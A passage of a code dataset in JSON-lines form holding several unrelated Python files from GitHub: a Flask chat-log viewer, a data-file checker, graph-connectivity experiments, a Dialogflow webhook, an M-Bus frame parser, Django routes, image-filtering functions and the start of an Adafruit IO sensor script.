'***'):\n continue\n timestamp = ' '.join(broken_message[:2])\n text = ' '.join(broken_message[3:])\n msgs.append(Message(timestamp, author, text))\n return msgs\n \n @property\n def title(self):\n return self.filepath.stem\n\n\n@app.route('/')\ndef index():\n return render_template('index.html', chats=list(chart.values()))\n\n\n@app.route('/chat/')\ndef show_chat(slug):\n try:\n chat = chart[int(slug)]\n return render_template('chat.html', chat=chat)\n except (KeyError, ValueError):\n return 'Oops, that chat does not exist! :-)'\n except IOError:\n abort(404)\n\nif __name__ == '__main__':\n for f in sorted(list(p.iterdir()), key=os.path.getctime):\n if f.suffix == '.weechatlog':\n chart[num] = Chat(f.absolute(), slug=num)\n num += 1\n\n app.debug = True\n common.serve()\n","repo_name":"RJ722/weeread","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16477695413","text":"import json\nimport os\nimport argparse\n\ndef check_for_data(start, end, path, filetype):\n \"\"\"\n Parameters\n ----------\n start (int), the first year of data\n end (int), the last year of data\n path (str), path to where to look for data\n filetype (str), a string in the format 'somefiletype-{y}-{m}.someextension'\n Returns\n -------\n missing (list), a list of strings of the missing data\n \"\"\"\n contents = os.listdir(path)\n missing = list()\n\n for year in range(start, end + 1):\n for month in range(1, 13):\n name = filetype.format(y=year, m=month)\n if name not in contents:\n missing.append(name)\n return missing\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-s', '--start', help=\"Start year\", type=int)\n parser.add_argument('-e', '--end', help=\"end year\", type=int)\n parser.add_argument('-t', '--filetype', help=\"name of the files, with {y} for the year and {m} for the month\")\n parser.add_argument('-p', '--path', help=\"path to directory to search\")\n parser.add_argument('-o', '--output', help=\"path of where to place output file\")\n ARGS = parser.parse_args()\n\n MISSING = check_for_data(\n start=ARGS.start,\n end=ARGS.end,\n path=ARGS.path,\n filetype=ARGS.filetype)\n\n if MISSING:\n print('found {} missing files'.format(len(MISSING)))\n\n with open(ARGS.output, 'w') as fp:\n json.dump(fp=fp, obj=MISSING)\n else:\n print('No files missing')\n ","repo_name":"sterlingbaldwin/utils","sub_path":"datasetcheck.py","file_name":"datasetcheck.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26215296358","text":"import ahocorasick_op, graph_build, graph_draw, graph_op, list_op, my_rand, naive\nimport sys, random, itertools\nimport tryalgo\n\ndef percent(a,b):\n\tif b != 0:\n\t return a/b*100\n\telse:\n\t\treturn 0\n\ndef connexity_test(A, m, n, frac, N, print_progression = False, line_print = False):\n AC_c = 0\n AC_sc = 0\n AC_empty = 0\n dB_c = 0\n dB_sc = 0\n dB_empty = 0\n h_c = 0\n h_empty = 0\n\n AC_c_and_dB_c = 0\n AC_c_and_not_dB_c = 0\n not_AC_c_and_not_dB_c = 0\n not_AC_c_and_dB_c = 0\n\n AC_sc_and_dB_sc = 0\n AC_sc_and_not_dB_sc = 0\n not_AC_sc_and_not_dB_sc = 0\n not_AC_sc_and_dB_sc = 0\n\n AC_c_and_h_c = 0\n AC_c_and_not_h_c = 0\n not_AC_c_and_not_h_c = 0\n not_AC_c_and_h_c = 0\n\n AC_sc_and_h_c = 0\n AC_sc_and_not_h_c = 0\n not_AC_sc_and_not_h_c = 0\n not_AC_sc_and_h_c = 0\n\n dB_c_and_h_c = 0\n dB_c_and_not_h_c = 0\n not_dB_c_and_not_h_c = 0\n not_dB_c_and_h_c = 0\n\n dB_sc_and_h_c = 0\n dB_sc_and_not_h_c = 0\n not_dB_sc_and_not_h_c = 0\n not_dB_sc_and_h_c = 0\n\n not_dB_c_and_h_empty = 0\n \n mean_AC = 0\n mean_dB = 0\n mean_h = 0\n\n mean_nb_cc_AC = 0\n mean_nb_cc_dB = 0\n mean_nb_cc_h = 0\n\n mean_max_len_cc_AC = 0\n mean_max_len_cc_dB = 0\n mean_max_len_cc_h = 0\n\t\n\n #thresholds to keep track of the computation progression\n thresholds = [5*i for i in range(1,22)]\n current_threshold_id = 0\n current_threshold = thresholds[current_threshold_id]\n for K in range(N):\n F = my_rand.rand_list_fraction(m, A, frac)\n G_AC = graph_build.acGraph_prime_n(A, F, n)\n G_dB = graph_build.deBruijn_n(A, F, n)\n #print(G_dB[0], G_dB[1])\n G_h = graph_build.hammmingGraph(A, F, n)\n \n nodes, _ = G_AC\n ccs = graph_op.connected_components(G_AC)\n mean_AC += len(nodes)\n mean_nb_cc_AC += len(ccs)\n mean_max_len_cc_AC += list_op.max_length(ccs)\n nodes, _ = G_dB\n ccs = graph_op.connected_components(G_dB)\n mean_dB += len(nodes)\n mean_nb_cc_dB += len(ccs)\n mean_max_len_cc_dB += list_op.max_length(ccs)\n nodes, _ = G_h\n ccs = graph_op.connected_components(G_h)\n mean_h += len(nodes)\n mean_nb_cc_h += len(ccs)\n mean_max_len_cc_h += list_op.max_length(ccs)\n\n\n AC_is_c = graph_op.is_connected(G_AC)\n AC_is_sc = graph_op.is_strongly_connected(G_AC)\n dB_is_c = graph_op.is_connected(G_dB)\n dB_is_sc = graph_op.is_strongly_connected(G_dB)\n h_is_c = graph_op.is_connected(G_h)\n if AC_is_c:\n AC_c += 1\n if AC_is_sc:\n AC_sc += 1\n if dB_is_c:\n dB_c += 1\n if dB_is_sc:\n dB_sc += 1\n if h_is_c:\n h_c += 1\n else:\n pass\n \"\"\"\n nodes, edges = G_h\n cc = tryalgo.strongly_connected_components.tarjan(edges)\n if list_op.min_length(cc) > 2:\n print(K)\n print(\"F: {}\".format(F))\n \n print(\"nodes: {}\".format(nodes))\n print(\"#nodes: {}\".format(len(nodes)))\n \n print(\"#components: {}\".format(len(cc)))\n print(\"max size component: {}\".format(list_op.max_length(cc)))\n graph_draw.draw_nx(graph_draw.listlist_to_nx(G_h))\n \"\"\"\n if AC_is_c and dB_is_c:\n AC_c_and_dB_c += 1\n if AC_is_c and (not dB_is_c):\n AC_c_and_not_dB_c += 1\n if (not AC_is_c) and (not dB_is_c):\n not_AC_c_and_not_dB_c += 1\n if (not AC_is_c) and dB_is_c:\n not_AC_c_and_dB_c += 1\n #print_everything(A, F, n)\n \n if AC_is_sc and dB_is_sc:\n AC_sc_and_dB_sc += 1\n if AC_is_sc and (not dB_is_sc):\n AC_sc_and_not_dB_sc += 1\n if (not AC_is_sc) and (not dB_is_sc):\n not_AC_sc_and_not_dB_sc += 1\n if (not AC_is_sc) and dB_is_sc:\n not_AC_sc_and_dB_sc += 1\n \n if AC_is_c and h_is_c:\n AC_c_and_h_c += 1\n if AC_is_c and (not h_is_c):\n AC_c_and_not_h_c += 1\n if (not AC_is_c) and (not h_is_c):\n not_AC_c_and_not_h_c += 1\n if (not AC_is_c) and h_is_c:\n not_AC_c_and_h_c += 1\n \n if AC_is_sc and h_is_c:\n AC_sc_and_h_c += 1\n if AC_is_sc and (not h_is_c):\n AC_sc_and_not_h_c += 1\n if (not AC_is_sc) and (not h_is_c):\n not_AC_sc_and_not_h_c += 1\n if (not AC_is_sc) and h_is_c:\n not_AC_sc_and_h_c += 1\n \n if dB_is_c and h_is_c:\n dB_c_and_h_c += 1\n if dB_is_c and (not h_is_c):\n dB_c_and_not_h_c += 1\n if (not dB_is_c) and (not h_is_c):\n not_dB_c_and_not_h_c += 1\n if (not dB_is_c) and h_is_c:\n not_dB_c_and_h_c += 1\n \n if dB_is_sc and h_is_c:\n dB_sc_and_h_c += 1\n if dB_is_sc and (not h_is_c):\n dB_sc_and_not_h_c += 1\n if (not dB_is_sc) and (not h_is_c):\n not_dB_sc_and_not_h_c += 1\n if (not dB_is_sc) and h_is_c:\n not_dB_sc_and_h_c += 1\n \n nodes, _ = G_AC\n if nodes == []:\n AC_empty += 1\n\n nodes, _ = G_dB\n if nodes == []:\n dB_empty += 1\n\n nodes, _ = G_h\n if nodes == []:\n h_empty += 1\n if not dB_is_c:\n not_dB_c_and_h_empty += 1\n #update current \"progression\" threshold if necessary\n if print_progression:\n while K >= N * current_threshold // 100 and current_threshold <= 100:\n print(\"|{}%\".format(current_threshold), end=\"\")\n sys.stdout.flush()\n current_threshold_id += 1\n current_threshold = thresholds[current_threshold_id]\n mean_AC /= N\n mean_dB /= N\n mean_h /= N\n mean_nb_cc_AC /= N\n mean_nb_cc_dB /= N\n mean_nb_cc_h /= N\n mean_max_len_cc_AC /= N\n mean_max_len_cc_dB /= N\n mean_max_len_cc_h /= N\n if print_progression:\n print(\"\")\n if line_print:\n print(\"{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{};{}\".format(A, m, n, frac, len(F), N,\n percent(AC_c, N), percent(dB_c, N), percent(h_c, N),\n percent(AC_sc, N), percent(dB_sc, N),\n percent(AC_empty, N), percent(dB_empty, N), percent(h_empty, N),\n percent(not_AC_c_and_not_h_c, N), #cases handled by theorem (with AC)\n percent(not_AC_c_and_not_h_c, max(N - h_c, 1)), #h-non connexity caught by theorem (with AC)\n percent(not_dB_c_and_not_h_c, N), #cases handled by theorem (with dB)\n percent(not_dB_c_and_not_h_c, max(N - h_c, 1)), #h-non connexity caught by theorem (with dB)\n percent(not_dB_c_and_h_c, max(N - dB_c, 1)), #counterexamples to theorem\n percent(AC_sc_and_dB_sc + not_AC_sc_and_not_dB_sc, N), #when both AC and dB have strong connexity at the same time\n percent(not_AC_c_and_dB_c, N), #counterexamples to: (not AC_c) => (not dB_c)\n mean_AC, mean_dB, mean_h, mean_nb_cc_AC, mean_nb_cc_dB, mean_nb_cc_h, mean_max_len_cc_AC, mean_max_len_cc_dB, mean_max_len_cc_h))\n\n sys.stdout.flush()\n else:\n print(\"A={}, m(F)={}, n={}, frac={}, |F|={}\".format(A, m, n, frac, len(F)))\n print(\"dB_c: {}% ({}/{})\".format(dB_c / N * 100, dB_c, N))\n print(\"dB_sc: {}% ({}/{})\".format(dB_sc / N * 100, dB_sc, N))\n print(\"h_c: {}% ({}/{})\".format(h_c / N * 100, h_c, N))\n print(\"h_empty: {}% ({}/{})\".format(h_empty / N * 100, h_empty, N))\n print(\"Cases handled by theorem: {}% ({}/{})\".format(not_dB_c_and_not_h_c / N * 100, not_dB_c_and_not_h_c, N))\n print(\"h-non connexity caught by theorem: {}% ({}/{})\".format(not_dB_c_and_not_h_c / max(N - h_c, 1) * 100, not_dB_c_and_not_h_c, N - h_c))\n print(\"Counterexamples to theorem: {}% ({}/{})\".format(not_dB_c_and_h_c / max(N - dB_c, 1) * 100, not_dB_c_and_h_c, N - dB_c))\n\ndef print_everything(A, F, n):\n print(\"F: {}\".format(F))\n print(\"#motifs: {}\".format(len(F)))\n\n G_AC_F_prime = graph_build.acGraph_prime(A, F)\n labels, edges = G_AC_F_prime\n print(\"AC_prime\")\n print(\"#nodes: {}\".format(len(labels)))\n print(labels)\n print(edges)\n graph_draw.draw_nx(graph_draw.listlist_to_nx(G_AC_F_prime))\n\n G = graph_build.deBruijn(A, F)\n nodes, edges = G\n print(\"dB\")\n print(\"#nodes: {}\".format(len(nodes)))\n print(nodes)\n print(edges)\n graph_draw.draw_nx(graph_draw.listlist_to_nx(G))\n\n G = graph_build.hammmingGraph(A, F, n)\n nodes, edges = G\n print(\"hamming\")\n print(\"#nodes: {}\".format(len(nodes)))\n #print(nodes)\n ccs = graph_op.strongly_connected_components(G)\n print(\"connected components: {}\".format(len(ccs)))\n list_op.print_lengths(ccs)\n #print(ccs)\n graph_draw.draw_nx(graph_draw.listlist_to_nx(G))\n\ndef print_per_n_from(A, F, n_ini, draw=False):\n n = n_ini\n print(\"F: {}\".format(F))\n print(\"#motifs: {}\".format(len(F)))\n while True:\n G = graph_build.hammmingGraph(A, F, n)\n nodes, _ = G\n ccs = graph_op.strongly_connected_components(G)\n print(\"n: {}\". format(n), end=\" | \")\n print(\"#nodes: {}\".format(len(nodes)), end=\" | \")\n print(\"#ccs: {}\".format(len(ccs)), end=\" | \")\n list_op.print_lengths(ccs)\n if draw:\n graph_draw.draw_nx(graph_draw.listlist_to_nx(G))\n n += 1\n\n\ndef rand_test(A, n, N, print_progression = True):\n mean_minus = 0.0\n mean_plus = 0.0\n max_minus = 0\n max_plus = 0\n mean_M = 0.0\n mean_max_length_M = 0.0\n mean_sum_length_M = 0.0\n max_M = 0\n max_max_length_M = 0\n max_sum_length_M = 0\n \n #thresholds to keep track of the computation progression\n thresholds = [5*i for i in range(1,22)]\n current_threshold_id = 0\n current_threshold = thresholds[current_threshold_id]\n for K in range(1, N+1):\n #choose w1 at random and obtain w2 with a random mutation\n w1 = my_rand.rand_word(n, A)\n i = random.randint(0, n-1)\n A2 = A.copy()\n A2.remove(w1[i])\n w2 = w1[:i] + random.choice(A2) + w1[i+1:]\n #compute M for both words\n M1 = naive.M(w1, A)\n M2 = naive.M(w2, A)\n #update stats\n minus, plus = list_op.difference(M1,M2)\n len_minus = len(minus)\n len_plus = len(plus)\n len_M1 = len(M1)\n max_length_M1 = list_op.max_length(M1)\n sum_length_M1 = list_op.sum_length(M1)\n\n mean_minus += len_minus\n mean_plus += len_plus\n max_minus = max(max_minus, len_minus)\n max_plus = max(max_plus, len_plus)\n mean_M += len_M1\n mean_max_length_M += max_length_M1\n mean_sum_length_M += sum_length_M1\n max_M = max(max_M, len_M1)\n max_max_length_M = max(max_max_length_M, max_length_M1)\n max_sum_length_M = max(max_sum_length_M, sum_length_M1)\n #update current \"progression\" threshold if necessary\n if print_progression:\n while K >= N * current_threshold // 100 and current_threshold <= 100:\n print(\"|{}%\".format(current_threshold), end=\"\")\n sys.stdout.flush()\n current_threshold_id += 1\n current_threshold = thresholds[current_threshold_id]\n if print_progression:\n print(\"\")\n mean_minus /= N\n mean_plus /= N\n mean_M /= N\n mean_max_length_M /= N\n mean_sum_length_M /= N\n #store stats in a dictionary\n d = {}\n d[\"A\"] = A\n d[\"n\"] = n\n d[\"N\"] = N\n d[\"mean_M\"] = mean_M\n d[\"max_M\"] = max_M\n d[\"mean_minus\"] = mean_minus\n d[\"mean_plus\"] = mean_plus\n d[\"max_minus\"] = max_minus\n d[\"max_plus\"] = max_plus\n d[\"mean_max_length_M\"] = mean_max_length_M\n d[\"max_max_length_M\"] = max_max_length_M\n d[\"mean_sum_length_M\"] = mean_sum_length_M\n d[\"max_sum_length_M\"] = max_sum_length_M\n return d\n\ndef print_stats_verbose(d, name_stats):\n for x in name_stats:\n print(\"{}: {}\".format(x,d[x]))\n\ndef print_stats_line(d, name_stats):\n for x in name_stats:\n print(\"{}\\t\".format(d[x]), end=\"\")\n print(\"\")\n sys.stdout.flush()\n\ndef print_stats_by_line_up_to_(K, A, N, name_stats):\n for k in range(20, K+1):\n d = rand_test(A, k, N, False)\n print_stats_line(d, name_stats)\n\ndef find_all_non_c_aux(A, words, len_words, n, current_F, i, rem, verbose):\n\tif rem == 0:\n\t\t#print(current_F)\n\t\tG_h = graph_build.hammmingGraph(A, current_F, n)\n\t\tif not graph_op.is_connected(G_h):\n\t\t\t#print(current_F)\n\t\t\tif verbose:\n\t\t\t\tG_AC_F_prime = graph_build.acGraph_prime(A, current_F)\n\t\t\t\tlabels, edges = G_AC_F_prime\n\t\t\t\tprint(\"AC_prime\")\n\t\t\t\tprint(\"#nodes: {}\".format(len(labels)))\n\t\t\t\tprint(labels)\n\t\t\t\tprint(edges)\n\t\t\t\tgraph_draw.draw_nx(graph_draw.listlist_to_nx(G_AC_F_prime))\n\t\t\t\tprint(\"hamming\")\n\t\t\t\tnodes, _ = G_h\n\t\t\t\tccs = graph_op.strongly_connected_components(G_h)\n\t\t\t\tprint(\"n: {}\". format(n), end=\" | \")\n\t\t\t\tprint(\"#nodes: {}\".format(len(nodes)), end=\" | \")\n\t\t\t\tprint(\"#ccs: {}\".format(len(ccs)), end=\" | \")\n\t\t\t\tlist_op.print_lengths(ccs)\n\t\t\t\t#graph_draw.draw_nx(graph_draw.listlist_to_nx(G_h))\n\t\t\tG_AC = graph_build.acGraph_prime(A, current_F)\n\t\t\tif not graph_op.is_connected(G_AC):\n\t\t\t\treturn (1, 1)\n\t\t\telse:\n\t\t\t\treturn (0, 1)\n\t\telse:\n\t\t\treturn (0, 0)\n\telse:\n\t\tK = 0 ; N = 0\n\t\tfor j in range(i+1, len_words - rem + 1):\n\t\t\tnew_F = [u for u in current_F]\n\t\t\tnew_F.append(words[j])\n\t\t\t(new_K, new_N) = find_all_non_c_aux(A, words, len_words, n, new_F, j, rem-1, verbose)\n\t\t\tK += new_K\n\t\t\tN += new_N\n\t\treturn (K, N)\n\t\t\n\ndef find_all_non_c(A, n, m, k, verbose = False):\n\tletters = \"\".join(A)\n\twords = []\n\tfor li in itertools.product(letters, repeat=m):\n\t\tu = \"\".join(li)\n\t\twords.append(u)\n\tlen_words = len(words)\n\tK, N = find_all_non_c_aux(A, words, len_words, n, [], -1, k, verbose)\n\tprint(K, N, percent(K,N))\n\t","repo_name":"mohoc/M2-misc","sub_path":"code/my_print.py","file_name":"my_print.py","file_ext":"py","file_size_in_byte":13983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23651169524","text":"from flask import Flask, request, abort, jsonify\nimport os ,json, threading\nfrom src.message import get_reply\n\napp = Flask(__name__)\ntoken = json.load((open('token.json')))\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get request body as text\n req = request.get_json(silent=True, force=True)\n # handle webhook body\n try:\n parameter = req['queryResult']['parameters']\n coin = parameter['CoinType']\n asktype = parameter['AskType'] if parameter['AskType'] else 'PRICE'\n fulfillmentText = get_reply(coin, asktype)\n except:\n fulfillmentText = 'Server is sleeping now. Sorry'\n abort(400)\n reply = {\n \"fulfillmentText\": fulfillmentText\n }\n return jsonify(reply)\n\n\nif __name__ == \"__main__\":\n port = None\n try:\n #hekoru\n port = int(os.getenv(\"PORT\"))\n except:\n #local\n port = 5050\n app.run(host=\"0.0.0.0\", port=port)\n\n #app.run()\n","repo_name":"LazyerIJ/Bithumb_Line_Bot","sub_path":"line_dialogflow_heroku/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8479623421","text":"from ctypes import c_char_p, cast, sizeof, addressof, memmove\n\nimport binascii\n\nfrom mbus.MBus import MBus, MBusFrame\nfrom mbus.MBusDataVariableHeader import MBusDataVariableHeader\nfrom mbus.MBusLowLevel import MBUS_FRAME_LONG_START, MBUS_CONTROL_MASK_RSP_UD, MBUS_CONTROL_INFO_RESP_VARIABLE, MBUS_FRAME_STOP, MBUS_FRAME_TYPE_LONG\n\nimport logging\nlog = logging.getLogger(__name__)\nlog.addHandler(logging.NullHandler())\n\nclass Lansen2MBus(object):\n def __init__(self, libpath=None):\n self._mbus = MBus(host=\"localhost\", port=8888, libpath=libpath)\n self._mbus_frame = MBusFrame()\n\n def getxml(self, buf):\n _l_field = buf[0]\n log.debug(\"L-field: %d\", _l_field)\n if _l_field != len(buf):\n log.debug(\"buf: %s\", binascii.hexlify(buf))\n raise Exception(\"L-field %d != length of frame %d\", _l_field, len(buf))\n\n if buf[10] != 0x7a:\n raise Exception(\"only short frame is supported\")\n\n _d_field = buf[15:]\n\n self._mbus._libmbus.parse_set_debug(1)\n\n self._mbus_frame.start1 = MBUS_FRAME_LONG_START\n self._mbus_frame.length1 = len(_d_field) + sizeof(MBusDataVariableHeader) + 3\n self._mbus_frame.length2 = self._mbus_frame.length1\n self._mbus_frame.start2 = self._mbus_frame.start1\n self._mbus_frame.control = MBUS_CONTROL_MASK_RSP_UD\n self._mbus_frame.address = 0x00\n self._mbus_frame.control_information = MBUS_CONTROL_INFO_RESP_VARIABLE\n self._mbus_frame.stop = MBUS_FRAME_STOP\n self._mbus_frame.type = MBUS_FRAME_TYPE_LONG\n\n header = MBusDataVariableHeader()\n header.id_bcd[0] = buf[4]\n header.id_bcd[1] = buf[5]\n header.id_bcd[2] = buf[6]\n header.id_bcd[3] = buf[7]\n header.manufacturer[0] = buf[2]\n header.manufacturer[1] = buf[3]\n header.version = buf[8]\n header.medium = buf[9]\n header.access_no = buf[11]\n header.status = buf[12]\n header.signature[0] = buf[13]\n header.signature[1] = buf[14]\n\n memmove(self._mbus_frame.data, addressof(header), sizeof(header))\n self._mbus_frame.data_size = sizeof(MBusDataVariableHeader) + len(_d_field)\n self._mbus_frame.data[12:self._mbus_frame.data_size] = [x for x in _d_field]\n\n self._mbus_frame.checksum = self._mbus_frame.control + self._mbus_frame.address + self._mbus_frame.control_information\n for i in range(0, self._mbus_frame.data_size):\n self._mbus_frame.checksum += self._mbus_frame.data[i]\n\n if self._mbus._libmbus.frame_verify(self._mbus_frame):\n raise Exception(\"mbus verification error: \" + str(self._mbus._libmbus.error_str()))\n\n mbus_frame_data = self._mbus.frame_data_parse(self._mbus_frame)\n xml_result = self._mbus._libmbus.frame_data_xml(mbus_frame_data)\n xml = cast(xml_result, c_char_p).value.decode('ISO-8859-1')\n return xml\n\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\n","repo_name":"droid4control/pylansen","sub_path":"pylansen/lansen2mbus.py","file_name":"lansen2mbus.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71501548906","text":"from django.urls import path\n\nfrom .views import get_user_autocomplete, DialogsView, DialogMessagesView\n# from .views import DialogsView, MessagesView, CreateDialogView\n\napp_name = 'private_messages'\n\nurlpatterns = [\n # path('dialogs/', DialogsView.as_view(), name='dialogs'),\n # path('dialogs/create//', CreateDialogView.as_view(), name='create_dialog'),\n # url(r'^dialogs/(?P\\d+)/$', login_required(views.MessagesView.as_view()), name='messages'),\n # path('dialogs/', DialogView.as_view(), name='show_dialog'),\n path('create/autocomplete/', get_user_autocomplete),\n # path('create/', CreateMessageView.as_view(), name='create_message'),\n path('dialog//', DialogMessagesView.as_view(), name='dialog_page'),\n path('', DialogsView.as_view(), name='dialogs'),\n]\n","repo_name":"DeeJeezz/articlesboard","sub_path":"private_messages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30965814930","text":"\nimport numpy as np\nimport cv2\nimport sys, math\nfrom PIL import Image\nfrom typing import Tuple, List\nimport matplotlib.pyplot as plt\nfrom skimage import io, img_as_float\nfrom histograms import *\n\ndef filterImage(inImage, kernel):\n\n M = inImage.shape[0] # Obtener el número de filas de la imagen\n N = inImage.shape[1] # Obtener el número de columnas de la imagen\n\n if kernel.ndim == 1:\n kernel_height = kernel.shape[0] # Obtener la altura del kernel\n kernel_width = 1 # La anchura del kernel es 1 para un kernel unidimensional\n else:\n kernel_height = kernel.shape[0] # Obtener la altura del kernel\n kernel_width = kernel.shape[1] # Obtener la anchura del kernel\n\n outImage = np.zeros(inImage.shape) # Crear una matriz de salida con las mismas dimensiones que la imagen de entrada\n\n height = (kernel_height - 1) // 2 # Calcular el desplazamiento vertical necesario para aplicar el kernel\n width = (kernel_width - 1) // 2 # Calcular el desplazamiento horizontal necesario para aplicar el kernel\n\n image = np.zeros((M + (2 * height), N + (2 * width))) # Crear una imagen con relleno\n\n # Copiar la imagen original en la imagen con relleno\n image[height:image.shape[0] - height, width:image.shape[1] - width] = inImage\n\n for row in range(M):\n for col in range(N):\n # Realizar la convolución del kernel con la sección correspondiente de la imagen con relleno\n outImage[row, col] = np.sum(kernel * image[row:row + kernel_height, col:col + kernel_width])\n\n return outImage\n\n\ndef createDelta(dims: Tuple[int, int] = (256, 256)) -> np.ndarray :\n blk = np.zeros(dims)\n\n blk[int(dims[0]/2), int(dims[1]/2)] = 1\n\n return blk\n\n\n\ndef gaussKernel1D(sigma):\n N = int(2 * np.ceil(3 * sigma) + 1) # Calcular el tamaño del kernel basado en el valor de sigma\n\n result = np.zeros(N) # Aarray de ceros para almacenar los valores del kernel\n\n mid = int(N / 2) # Calcular la posición central del kernel\n\n # fórmula de la función de distribución Gaussiana\n result = np.array([(1 / (np.sqrt(2 * np.pi) * sigma)) * (1 / (np.exp((i ** 2) / (2 * sigma ** 2)))) for i in range(-mid, mid + 1)])\n\n return result / sum(result) # Normalizar el kernel dividiendo por la suma de sus valores\n\n\n\n\n\n\ndef gaussianFilter (inImage, sigma):\n\n gausskernel = gaussKernel1D(sigma)\n out = filterImage(inImage, gausskernel)\n out2 = filterImage(out, np.transpose(gausskernel))\n\n return out2\n\n\n\n\ndef medianFilter(inImage: np.ndarray, filterSize: int) -> np.ndarray:\n \n dim = np.shape(inImage) # Dimensiones de la imagen de entrada\n outImage = np.empty(dim) # Crear una matriz vacía para almacenar la imagen de salida\n mitad = int((filterSize / 2)) # Calcular la mitad del tamaño del filtro\n\n for row in range(0, dim[0]): # Iterar por cada fila de la imagen\n for col in range(0, dim[1]): # Iterar por cada columna de la imagen\n\n # Calcular los límites superior e inferior de la submatriz basados en la posición actual y el tamaño del filtro\n left = 0 if (row - mitad) < 0 else row - mitad\n right = dim[0] - 1 if (row + mitad) > (dim[0] - 1) else row + mitad + 1\n top = 0 if (col - mitad) < 0 else col - mitad\n bottom = dim[1] - 1 if (col + mitad) > (dim[1] - 1) else col + mitad + 1\n\n submatrix = inImage[left:right, top:bottom] # Extraer la submatriz de la imagen original\n outImage[row, col] = np.median(submatrix) # Calcular el valor mediano de la submatriz y asignarlo a la imagen de salida\n\n return outImage # Devolver la imagen de salida filtrada\n\n\n\n\ndef highBoost(inImage,A,method,param):\n\t#condiciones\n if (method is None) or (param is None):\n return inImage\n\n if method == 'gaussian' :\n outImage = gaussianFilter(inImage,param) \n else :\n \tif method == 'median' :\n \t\t#outImage = medianFilter(inImage,int(param))\n \toutImage = medianFilter(inImage,int(param))\n \telse:\n \treturn None\n\n if A >= 0:\n #Si es positivo guardamos informacion de la imagen\n inImage = np.multiply(inImage,A).astype(np.uint8)\n return np.subtract(inImage,outImage)\n else:\n return outImage\n\n\n\n#filter_image example \ndelta = createDelta()\nio.imsave(\"./resultados/delta.png\", delta)\n\n\n# kernel=cv2.imread('kernel1.png')\n# kernel=cv2.cvtColor(kernel,cv2.COLOR_BGR2GRAY)\n# delta=cv2.imread('delta.png')\n# delta=cv2.cvtColor(delta,cv2.COLOR_BGR2GRAY)\n\n# # M = inImage.shape[0] # Obtener el número de filas de la imagen\n# # N = inImage.shape[1] # Obtener el número de columnas de la imagen\n# # print(M)\n# # print(N)\n# #delta=cv2.cvtColor(delta,cv2.COLOR_BGR2GRAY)\n# # laplacian = np.array((\n# # [0, 1, 0],\n# # [1, -4, 1],\n# # [0, 1, 0]), dtype=\"int\")\n\n# outImage2=filterImage(delta,kernel[:-1,:-1])\n# io.imsave(\"./resultados/pruebakernel.png\", outImage2)\n#cv2.imshow('original',gris)\n#cv2.imshow('mi filtro',outImage2)\n\n\n\n#######KERNEL FUNCTION####################\n# salida=gaussKernel1D(10)\n# print(salida)\n# plt.plot(salida)\n\n# plt.show()\n\n\n\n\n#######GAUSSIAN FUNCTION####################\n# gauss=cv2.imread('delta.png')\n# gris=cv2.cvtColor(gauss,cv2.COLOR_BGR2GRAY)\n# outImage1=gaussianFilter(gris, 5)\n# #outImage1 = adjustIntensity(outImage1, outRange=[0, 255])\n# #outImage2=cv2.GaussianBlur(gris,(7,7),0)\n# # cv2.imshow('original',gris)\n# # cv2.imshow('mi filtro',outImage1)\n# imgMod = gaussianFilter(gris, 10)\n# io.imsave(\"./resultados/gaussianFilter.png\", adjustIntensity(imgMod, [], [0, 255]))\n# plotgaussian=cv2.imread('gaussianFilter.png')\n# #(hist, binsIn) = np.histogram(plotgaussian, 256)\n# plt.plot(256, imgMod)\n\n# plt.show()\n\n\n\n\n##########MEDIAN FUNCTION####################\n# lisa = cv2.imread('grid.png')\n# img_median = cv2.medianBlur(lisa, 5)\n\n# cv2.imshow(\"median\", np.hstack((lisa, img_median)))\n# img = Image.open(\"grid.png\").convert(\"L\")\n# arr = np.array(img)\n# removed_noise = medianFilter(arr, 5) \n# img = Image.fromarray(removed_noise)\n# img.show()\n\n\n#######HIGH FUNCTION####################\n# img = Image.open(\"image2.png\").convert(\"L\")\n# arr = np.array(img)\n# outImage1=highBoost(arr,-3,\"median\",5)\n# #En caso de gaussian poner lo de abajo\n# #outImage1 = adjustIntensity(outImage1, outRange=[0, 255])\n# #io.imsave(\"./resultados/highGaussianFilter.png\", adjustIntensity(imgMod, [], [0, 255]))\n# img = Image.fromarray(outImage1)\n# img.show()\n\n\n\n\n\ncv2.waitKey(0)","repo_name":"xabijg/VA","sub_path":"p1/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38355416992","text":"import time\n\nfrom si7021 import Si7021\n\nimport Adafruit_DHT\n\nimport bme680\n\nimport board\nimport busio\nimport adafruit_mpl115a2\n\n# Import Adafruit IO REST client.\nfrom Adafruit_IO import Client, RequestError, Feed\n\n# Import the device driver stuff\nfrom smbus import SMBus\n\n# Set to your Adafruit IO key.\n# Remember, your key is a secret,\n# so make sure not to publish it when you publish this code!\nADAFRUIT_IO_KEY = 'xxxxx'\n\n# Set to your Adafruit IO username.\n# (go to https://accounts.adafruit.com to find your username)\nADAFRUIT_IO_USERNAME = 'xxxxx'\n\n# Create an instance of the REST client.\nAIO = Client(ADAFRUIT_IO_USERNAME, ADAFRUIT_IO_KEY)\n\n# Access or create the data feeds to adafruit.io\ntry:\n TEMPERATURE_SI7021_FEED = 